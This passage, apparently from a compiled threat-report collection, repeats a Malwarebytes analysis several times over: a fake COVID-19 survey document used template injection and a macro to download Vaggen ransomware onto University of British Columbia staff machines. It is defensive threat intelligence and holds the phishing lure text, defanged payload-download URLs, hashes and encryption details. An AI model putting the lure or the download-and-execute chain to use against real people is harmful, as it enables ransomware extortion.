3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 161 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 162 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 163 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 164 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 165 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 166 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 167 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 168 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 169 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 170 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 171 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 172 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 173 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 174 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 175 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 176 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 177 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 178 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 179 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 180 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 181 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 182 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 183 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 184 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 185 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 186 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 187 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 188 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 189 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 190 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 191 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 192 of 